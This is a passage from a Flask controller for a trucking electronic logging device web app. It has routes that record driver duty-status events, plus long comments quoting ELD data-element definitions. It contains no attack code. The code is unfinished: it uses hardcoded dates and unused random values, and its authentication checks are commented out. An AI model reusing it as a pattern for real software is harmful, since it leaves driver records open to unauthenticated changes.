str(datetime.datetime.today().month) + \"/\" + str(datetime.datetime.today().day) + \"/\" + str(datetime.datetime.today().year)\n data = date.split('/')\n date = str(datetime.datetime.today().month) + \"-\" + str(datetime.datetime.today().day) + \"-\" + str(datetime.datetime.today().year)\n\n\n dateforfiltering = str(date).split(\"-\")\n dateforfiltering = str(dateforfiltering[2]) + \"\" + str(dateforfiltering[1]) + \"\" + str(dateforfiltering[0])\n date_to_redirect_to_edit = str(dateforfiltering[2]) + \"-\" + str(dateforfiltering[1]) + \"-\" + str(dateforfiltering[0])\n thisdata_ = Events.query.filter_by(todays_log=int('3032018')).all()\n newlist_ = []\n for i in thisdata_:\n #(str(i).split(\",\")\n newlist_.append(str(i).split(\",\"))\n\n\n #Google Charts working code for logs\n stateinitial = [0,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,8]\n reportinglist = []\n for i in range(0,len(newlist_)):\n # if(int(rows[1][0]) > 499):\n newdata = []\n try:\n newdata.append(int(i))\n newdata.append(int(newlist_[i][6]))\n\n reportinglist.append(newdata)\n except Exception as e:\n print(e)\n current_status = 'driving'\n # if not current_user.is_authenticated:\n # return redirect(url_for('admin.login_view'))\n _date_ = request.args.get(\"log_date\")\n #if len(str(_date_)) < 1:\n _data_ = '2932018'\n event_log = Events.query.filter_by(todays_log=int('2932018')).all()\n return render_template('logs.html', form=form, elog=elog, role = 2, current_status = current_status, events_log = event_log, logdata = reportinglist, thiddate_ = dateforfiltering, date_to_redirect_to_edit = date_to_redirect_to_edit)\n\n\n@logs_blueprint.route('/showlogs_driver', methods=['GET', 'POST'])\ndef logs_driver():\n date = request.form.get('datefrom')\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n date = request.form.get('datefrom')\n except Exception as e:\n date = \"2017-03-03\"\n # date = \"2017-03-03\"\n print(date)\n todayslog___ = date.split(\"-\")\n todayslog___ = str(todayslog___[2]) + \"\" + str(todayslog___[1]) + \"\" + str(todayslog___[0])\n # date = \"2017-03-03\"\n data = Events.query.filter_by(todays_log=todayslog___).all()\n\n # data = RPM.query.filter_by(user_id=current_user.get_id(), daterecorded=date).all()\n # print(data)\n stateinitial = []\n for i in data:\n stateinitial.append(int(i.rpm))\n\n timestate = []\n state = []\n counter = 1\n newlist = []\n\n for i in range(0, len(stateinitial)):\n # if(int(rows[1][0]) > 499):\n newval = random.randint(450, 600)\n\n if (stateinitial[i] > 499):\n state.append(1)\n timestate.append(counter)\n else:\n state.append(0)\n timestate.append(counter)\n counter += 1\n\n for i in range(1, len(state)):\n try:\n if (state[i] != state[i + 1]):\n newlist.append(i + 1)\n except Exception as e:\n print(e)\n counter = 0\n for i in newlist:\n if (state[i + counter] == 1):\n state.insert(i + counter, 1)\n timestate.insert(i + counter, i)\n else:\n state.insert(i + counter, 0)\n timestate.insert(i + counter, i)\n counter += 1\n data = state\n xdata = timestate\n\n # if not current_user.is_authenticated:\n # return redirect(url_for('admin.login_view'))\n return render_template('logs.html', form=form, elog=elog, xdata=xdata, data=data, datedata=date, role = 2)\n\n\n# AJAX\n@logs_blueprint.route('/DRIVING', methods=['GET'])\ndef driving():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n print(\"Driving\")\n if(datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [1, current_user.get_id()])\n db.session.commit()\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 3, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n #db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [1, 1])\n return jsonify(result=\"Driving\")\n\n # id = Column(Integer, primary_key = True, autoincrement = True)\n # #Type 1\n # Event_Sequence_ID_Number = Column(Integer)\n # # Description : This data element refers to the serial identifier assigned to each required\n # ELD event as described in section 4.5.1 of this appendix.\n # Purpose : Provides ability to keep a continuous record, on a given ELD, across all\n # users of that ELD.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD maintained; incremented by 1 for each new record on the ELD;\n # continuous for each new event the ELD records regardless of owner of the records.\n # Data Range : 0 to FFFF; initial factory value must be 0; after FFFF hexadecimal\n # (decimal 65535), the next Event Sequence ID number must be 0. \n # 148\n # Data Length : 1-4 characters.\n # Data Format : <Event Sequence ID Number > as in <C> to <CCCC>.\n # Disposition : Mandatory.\n # Examples : [1], [1F2C], [2D3], [BB], [FFFE]. \n # Event_Sequence_ID_Number = Column(Integer)\n # Event_Record_Status = Column(Integer)\n # Event_Record_Origin = Column(Integer)\n # Event_Type = Column(Integer)\n # Event_Code = Column(Integer) \n\n # 7.23 Event Record Status\n # Description : An attribute for the event record indicating whether an event is active or\n # inactive and further, if inactive, whether it is due to a change or lack of confirmation by\n # the driver or due to a driver’s rejection of change request.\n # Purpose : Provides ability to keep track of edits and entries performed over\n # ELD records while retaining original records.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD recorded and maintained event attribute in accordance with the\n # procedures outlined in sections 4.4.4.2.2, 4.4.4.2.3, 4.4.4.2.4, 4.4.4.2.5, and 4.4.4.2.6 of\n # this appendix.\n # Data Range : 1, 2, 3 or 4 as described on Table 8 of this appendix. \n # 147\n # Data Length : 1 character.\n # Data Format : <Event Record Status> as in <C>.\n # Disposition : Mandatory.\n # Examples : [1], [2], [3], [4] \n\n\n # Event_Record_Origin = Column(Integer)\n # Description : An attribute for the event record indicating whether it is automatically\n # recorded, or edited, entered or accepted by the driver, requested by another authenticated\n # user, or assumed from unidentified driver profile.\n # Purpose : Provides ability to track origin of the records.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD recorded and maintained event attribute in accordance with the\n # procedures outlined in sections 4.4.4.2.2, 4.4.4.2.3, 4.4.4.2.4, 4.4.4.2.5, and 4.4.4.2.6 of\n # this appendix.\n # Data Range : 1, 2, 3 or 4 as described on Table 7 of this appendix.\n # Data Length : 1 character.\n # Data Format : <Event Record Origin> as in <C>.\n # Disposition : Mandatory. \n # 146\n # Examples : [1], [2], [3], [4]. \n\n # Event_Type = Column(Integer)\n # Description : An attribute specifying the type of the event record.\n # Purpose : Provides ability to code the type of the recorded event in electronic\n # format.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD recorded and maintained event attribute in accordance with the type\n # of event being recorded.\n # Data Range : 1-7 as described on Table 9 of this appendix.\n # Data Length : 1 character.\n # Data Format : <Event Type> as in <C>.\n # Disposition : Mandatory.\n # Examples : [1], [5], [4], [7].\n # Table 9\n # “Event Type” Parameter Coding\n # Event Type Event Type Code\n # A change in driver’s duty-status 1\n # An intermediate log 2 \n # 149\n # A change in driver’s indication of authorized personal use of\n # CMV or yard moves\n # 3\n # A driver’s certification/re-certification of records 4\n # A driver’s login/logout activity 5\n # CMV’s engine power up / shut down activity 6\n # A malfunction or data diagnostic detection occurrence 7 \n\n\n # Event_Code = Column(Integer)\n # Description : A dependent attribute on “Event Type” parameter that further specifies\n # the nature of the change indicated in “Event Type”; t`his parameter indicates the new\n # status after the change.\n # Purpose : Provides ability to code the specific nature of the change electronically.\n # Source : ELD internal calculations.\n # Used in : ELD event records; ELD outputs.\n # Data Type : ELD recorded and maintained event attribute in accordance with the type\n # of event and nature of the new status being recorded.\n # Data Range : Dependent on the “Event Type” as indicated on Table 6 of this appendix.\n # Data Length : 1 character.\n # Data Format : <Event Type> as in <C>.\n # Disposition : Mandatory.\n # Examples : [0], [1], [4], [9]. \n\n\n # Event_Date = Column(Date)\n # Event_Time = Column(Time)\n # Accumulated_Engine_Miles = Column(Integer)\n # Elapsed_Engine_Hours = Column(Integer)\n # Description : This data element refers to the time the CMV’s engine is powered in\n # decimal hours with 0.1 hr (6-minute) resolution; this parameter is a placeholder for\n # <{Total} Engine Hours>, which refers to the aggregated time of a vehicle’s engine’s\n # operation since its inception, and used in recording “engine power on” and “engine shut\n # down” events, and also for <{Elapsed} Engine Hours>, which refers to the elapsed time\n # in the engine’s operation in the given ignition power on cycle, and used in the recording\n # of all other events.\n # Purpose : Provides ability to identify gaps in the operation of a CMV, when the\n # vehicle’s engine may be powered but the ELD may not; provides ability to cross check\n # integrity of recorded data elements in events and prevent gaps in the recording of ELD.\n # Source : ELD measurement or sensing.\n # Used in : ELD events; ELD outputs.\n # Data Type : Acquired from the engine ECM or a comparable other source as allowed\n # in section 4.3.1.4.\n # Data Range : For <{Total} Engine Hours>, range is between 0.0 and 99,999.9; for\n # <{Elapsed} Engine Hours>, range is between 0.0 and 99.9.\n # Data Length : 3-7 characters.\n # Data Format : <Vehicle Miles> as in <C.C> to <CCCCC.C>.\n # Disposition : Mandatory.\n # Examples : [0.0], [9.9], [346.1], [2891.4]. \n\n\n # Event_Latitude = Column(Float)\n # Event_Longitude = Column(Float)\n # Distance_Since_Last_Valid_Coordinates = Column(Integer)\n # Malfunction_Indicator_Status = Column(Integer)\n # # Description : A code that further specifies the underlying malfunction or data\n # # diagnostic event.\n # # Purpose : Enables coding the type of malfunction and data diagnostic event to\n # # cover the standardized set in Table 4 of this appendix.\n # # Source : ELD internal monitoring.\n # # Used in : ELD events; ELD outputs.\n # # Data Type : Recorded by ELD when malfunctions and data diagnostic events are set\n # # or reset. \n # # 157\n # # Data Range : As specified in Table 4 of this appendix.\n # # Data Length : 1 character.\n # # Data Format : <C>.\n # # Disposition _ : Mandatory.\n # # Examples : [1], [5], [P], [L]. \n \n # Data_Diagnostic_Event_Indicator_Status = Column(Integer)\n # Event_Comment = Column(Char)\n # Drivers_Location_Description = Column(Char)\n # Event_Data_Check_Value = Column(Integer)\n #Type 2(b) \n\n\n@logs_blueprint.route('/ONDUTY', methods=['GET'])\ndef onduty():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n print(\"on duty\")\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [2, current_user.get_id()])\n db.session.commit()\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 4, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(),user_id = current_user.get_id() , todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit()\n\n\n except Exception as e:\n print(e)\n return jsonify(result=\"On Duty\")\n\n\n@logs_blueprint.route('/SLEEPING', methods=['GET'])\ndef sleeping():\n \"\"\"Add two numbers server side, ridiculous but well...\"\"\"\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [3, current_user.get_id()])\n db.session.commit()\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 2, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), device_id = driver_id, todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n\n except Exception as e:\n print(e)\n print(\"Sleep\")\n return jsonify(result=\"Sleeping\")\n\n\n@logs_blueprint.route('/OFFDUTY', methods=['GET'])\ndef offduty():\n \"\"\"Add two numbers server side, ridiculous but well...\"\"\"\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [4, current_user.get_id()])\n db.session.commit()\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 1, Event_Code = 1, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), device_id = driver_id, todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n print(\"off duty\")\n return jsonify(result=\"Off Duty\")\n\n\n@logs_blueprint.route('/authorized', methods=['GET'])\ndef authorized():\n \"\"\"Add two numbers server side, ridiculous but well...\"\"\"\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n db.engine.execute('update drivers set \"Current_Status\" = %s where user_id = %s', [4, current_user.get_id()])\n db.session.commit()\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 3, Event_Code = 1, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), device_id = driver_id, todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n return jsonify(result=\"Authorized Personal Use of CMV\")\n\n\n@logs_blueprint.route('/yard', methods=['GET'])\ndef yard():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 3, Event_Code = 2, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id())\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n print(\"off duty\")\n return jsonify(result=\"Yard Moves\")\n\n\n@logs_blueprint.route('/cleared', methods=['GET'])\ndef cleared():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n try:\n driverid_1 = db.engine.execute('select uid from drivers where user_id = %s', [current_user.get_id()])\n for i in driverid_1 :\n driver_id = i[0]\n if (datetime.datetime.today().day) < 10:\n today_ = \"0\" + str(datetime.datetime.today().day)\n else:\n today_ = str(datetime.datetime.today().day)\n todaysdate_ = str(today_) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 3, Event_Code = 0, Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), todays_log = todaysdate_)\n db.session.add(event)\n db.session.commit() \n except Exception as e:\n print(e)\n print(\"off duty\")\n return jsonify(result=\"Indication for PC, YM, and WT Cleared\")", "repo_name": "SteelCode23/Python-REST-API", "sub_path": "webapp1/controllers/logs.py", "file_name": "logs.py", "file_ext": "py", "file_size_in_byte": 25852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 12, "usage_type": "call"}, {"api_name": "webapp1.forms.CertifyForm", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "webapp1.forms.CertifyForm", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 45, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 45, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 45, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 57, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 58, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 58, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 58, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 59, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 59, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 71, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 71, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "webapp1.models.drivers", "line_number": 73, "usage_type": "call"}, {"api_name": "webapp1.models.db.session.add", "line_number": 74, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 74, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 74, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.rollback", "line_number": 77, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 77, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.is_authenticated", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 97, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 97, "usage_type": "name"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 102, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 102, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 110, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 111, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 113, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 114, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 120, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 120, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.is_authenticated", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 141, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 162, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 165, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 165, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 165, "usage_type": "name"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 178, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 178, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 180, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 180, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 186, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 186, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 209, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 209, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 209, "usage_type": "name"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 212, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 212, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 212, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 218, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 218, "usage_type": "name"}, {"api_name": "webapp1.forms.ElogForm", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 219, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 219, "usage_type": "name"}, {"api_name": "webapp1.forms.DriverForm", "line_number": 220, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 220, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 220, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "webapp1.models.Events.query.filter_by", "line_number": 230, "usage_type": "call"}, {"api_name": "webapp1.models.Events.query", "line_number": 230, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 230, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 245, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 281, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 281, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 281, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 282, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 282, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 284, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 284, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 285, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 285, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 287, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 288, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 288, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 289, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 289, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 289, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 289, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 289, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 290, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 290, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 290, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 291, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.session.add", "line_number": 292, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 292, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 293, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 293, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 293, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 455, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 455, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 455, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 456, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 456, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 456, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 459, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 459, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 459, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 459, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 459, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 462, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 462, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 463, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 463, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 465, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 465, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 466, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 466, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 467, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 467, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 467, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 467, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 467, "usage_type": "name"}, {"api_name": 